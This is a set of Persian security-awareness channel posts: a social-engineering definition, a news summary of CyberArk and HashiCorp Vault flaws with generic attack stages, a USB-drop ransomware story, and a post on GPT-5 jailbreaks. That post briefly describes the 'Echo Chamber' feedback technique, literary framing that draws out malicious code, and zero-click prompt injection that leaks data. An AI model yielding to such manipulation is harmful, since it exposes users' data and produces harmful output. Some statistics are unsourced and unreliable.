او اسم این روش را «مهندسی اجتماعی» گذاشت، اصطلاحی که هکرها از اواسط دهه ۱۹۷۰ استفاده میکنند. به گفته شارون کانهدی (مشاور امنیتی)، «مهندسی اجتماعی هکری شامل قانع کردن افراد برای انجام دادن کارهاییست که به طور عادی انجام نمیدهند.» این کارها شامل لو دادن رمز عبور، اجازه دادن به افراد برای تردد در مناطق محدود شرکت، دادن دسترسی به اطلاعات محرمانه یا مالی یا ورود به یک وبسایت آلوده است.

برای هکرهای مهندس اجتماعی، هدف این تکنیک، خود فرد است: منشی، کارمند IT، مدیرعامل، یا کارکنان یک کمپین سیاسی.

@TryHackBoxStory

🔐 هشدار امنیتی: سوءاستفاده از آسیب‌پذیری‌های CyberArk و HashiCorp Vault
📅 گزارش از The Hacker News – آگوست ۲۰۲۵

🚨 خلاصه حمله:
مهاجمان با سوءاستفاده از ۱۴ آسیب‌پذیری کشف‌شده در سیستم‌های مدیریت اسرار CyberArk و HashiCorp Vault می‌توانند بدون نیاز به رمز عبور به اطلاعات محرمانه سازمان‌ها دسترسی پیدا کنند.

⚠️ نحوه اجرای حمله:

شناسایی سیستم‌های آسیب‌پذیر:
اسکن شبکه برای یافتن نسخه‌های قدیمی CyberArk/HashiCorp
اتصال به APIهای مدیریتی:
سوءاستفاده از باگ‌های احراز هویت برای دسترسی غیرمجاز
دور زدن مکانیزم‌های امنیتی:
استفاده از آسیب‌پذیری‌های زنجیره‌ای برای افزایش دسترسی
سرقت اسرار سازمانی:
استخراج رمزهای عبور، کلیدهای API و گواهی‌های دیجیتال

🎯 اهداف حمله:
دسترسی به زیرساخت‌های حیاتی سازمان
سرقت اطلاعات حساس کسب‌وکارها
انجام حملات گسترده‌تر مانند جعل هویت دیجیتال

✍️نویسنده
@TryHackBoxStory | The Chaos
#CyberArk #HashiCorp #News

🔥 مدل GPT-5 هک شد: تکنیک‌های "Echo Chamber" و روایت‌گری آن را فریب داد

📅 گزارش اختصاصی – آگوست ۲۰۲۵

🚨 هشدار امنیتی:
مدل جدید مورد اعتماد نیست

🧠 مدل GPT-5: یک دلفین باهوش اما گمراه‌کننده!
مدل جدید مانند "دلفینی با ضریب هوشی بالا اما بی‌درک از معنای واقعی کلمات" عمل می‌کند:
می‌تواند متن‌های پیچیده تولید کند
اما درک واقعی از خطرات امنیتی محتوای تولیدشده ندارد
به راحتی با تکنیک‌های مهندسی اجتماعی فریب می‌خورد

⚠️ حملات کشف‌شده:
حمله Zero-Click Prompt Injection:
- سرقت داده از گوگل درایو، جیرا، Microsoft Copilot Studio
- نشت مکالمات محرمانه کاربران
- حتی هک خانه‌های هوشمند از طریق یک دستور متنی!

دور زدن محدودیت‌ها با تکنیک‌های خلاقانه:
- استفاده از استعاره‌های ادبی برای پوشش دستورات خطرناک
- ساخت داستان‌های پیچیده که در نهایت کد مخرب ارائه می‌دهند
- روش "Echo Chamber": تکرار و بازخورد دادن پاسخ‌های مدل به خودش تا محدودیت‌ها را بشکند

✍️نویسنده
@TryHackBoxStory | The Chaos
#Echo_Chamber #GPT5 #News

🖼Pic of the Day
🖼تصویر امروزمون

امیدوارم خنده به لباتون اومده باشه ولی مشکلات عمده ای هستند که ما باید با هم بررسی شون کنیم خارج از شوخی تا بتونیم شرکت هامون و دفتر هامون رو امن نگه داریم

✍️نویسنده
@TryHackBoxStory | The Chaos

🔐"یو‌اس‌بی گمشده و درس امنیتی برای کسب‌وکارها"

📌 کشف تصادفی
"محمد، کارمند بخش مالی یک شرکت، در پارکینگ شرکت یک فلش‌درایو براق روی زمین دید. با خودش فکر کرد: 'شاید اطلاعات مهمی توش باشه! بیایم ببینیم چی داخلشه...'"

💥 نقطه بحرانی:
- او فلش را به کامپیوتر بدون آنتی‌ویروس متصل کرد
- ناگهان کل سیستم قفل شد
- تمام فایل‌های مالی شرکت رمزنگاری شدند

🔍 تحلیل امنیتی:
این یک حمله مهندسی اجتماعی کلاسیک بود:
- هکرها عمداً فلش‌درایوهای آلوده را در محیط‌های کاری می‌اندازند
- 68% افراد کنجکاو، آنها را به سیستم متصل می‌کنند (آمار 2025)

🎯 درس‌های کلیدی برای کسب‌وکارها:

1. امنیت فقط وظیفه آی‌تی نیست:
- هر کارمند یک "خط مقدم دفاع سایبری" است
- آموزش ماهانه امنیت سایبری اجباری باشد

2. سیاست‌های سخت‌گیرانه:
- ممنوعیت کامل استفاده از حافظه‌های خارجی ناشناس
- اجرای دسترسی ابری امن به جای USB

3. واکنش سریع:
- ایجاد تیم پاسخگویی به حوادث در هر بخش
- شبیه‌سازی حملات فیشینگ هر فصل

💡 جمله اثرگذار:
"در دنیای امروز، یک فلش‌درایو بی‌صاحب می‌تواند خطرناک‌تر از یک اسلحه پر باشد!"

نکته نهایی:
کسب‌وکارهایی که فرهنگ امنیتی را در تمام سطوح گسترش ندهند،
به زودی قربانی ساده‌ترین ترفندهای هکری خواهند شد!

✍️نویسنده
@TryHackBoxStory | The Chaos

درود خدمت دوستان گرامی بنده اینجا کانال شخصی منه روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .

@KavehAPT